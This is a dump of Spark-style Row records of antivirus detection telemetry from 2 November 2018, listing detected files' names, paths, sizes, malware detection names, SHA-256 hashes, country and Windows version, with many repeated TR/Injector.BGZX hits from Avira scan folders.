  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151737-4cf591e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151609-44D143DE\\AVSCAN-20181102-151737-4CF591E1', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:17:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090056-15a3e52e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8770ece\\AVSCAN-20181102-090033-1300E4BB\\AVSCAN-20181102-090056-15A3E52E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100230-bc024200', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100148-B6DD3C51\\AVSCAN-20181102-100230-BC024200', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000761c', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp0000761c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:52:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054529-79f89aad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054529-79F89AAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055625-00a0e21c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055625-00A0E21C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051902-c83830ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051902-C83830CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055247-7ede85fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055247-7EDE85FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061206-32019b1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061206-32019B1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061235-4330413c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061235-4330413C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='\\?\\C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='732a32981540f2e22fb53ee75cc106761595feefddb07e3f41126a834a8d065d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='60f5a3d0559cf42a82e15e242bc4d2d7902f9d508ab48739c0a4ab8d72dced53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\60F5A3D0559CF42A82E15E242BC4D2D7902F9D508AB48739C0A4AB8D72DCED53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='60f5a3d0559cf42a82e15e242bc4d2d7902f9d508ab48739c0a4ab8d72dced53', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050314-93167dc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050314-93167DC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wyjtdfvi.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\wYJtdFVi.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050729-2af37ca6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050729-2AF37CA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054241-15c5c038', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054241-15C5C038', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054632-9f58ae58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054632-9F58AE58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath='K:\\HBCD\\Programs\\FLASHMEMORYTOOLKIT.EXE', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\HBCDMenu.exe', parentsize=17920, timestamp='2018-11-02T08:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055401-ab3cd78e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055401-AB3CD78E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061244-485deb68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061244-485DEB68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeachbt.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\NBEACHBT\\NBEACHBT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054209-02de833e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054209-02DE833E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061355-728953b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061355-728953B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055601-f278aa21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055601-F278AA21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051359-136aff1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051359-136AFF1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054659-afbc66c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054659-AFBC66C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055518-d8fe726e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D8FE726E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053019-5b6e639c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053019-5B6E639C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060615-60abceb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060615-60ABCEB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061135-1f09a59a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061135-1F09A59A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053449-fc2b6efd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053449-FC2B6EFD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055333-9a790ba3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055333-9A790BA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052054-0a6b49a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052054-0A6B49A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061104-0c9473e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061104-0C9473E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052010-f03e5ab1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052010-F03E5AB1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055336-9c2d7c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055336-9C2D7C9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053525-118c595f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053525-118C595F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060859-c279856b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060859-C279856B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060404-1283cf52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060404-1283CF52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053525-120eda42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053525-120EDA42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062159-935d5401', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062159-935D5401', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050926-70c593db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050926-70C593DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052108-12ecb1b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052108-12ECB1B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:07Z'), dt=datetime.date(2018, 11, 2)),
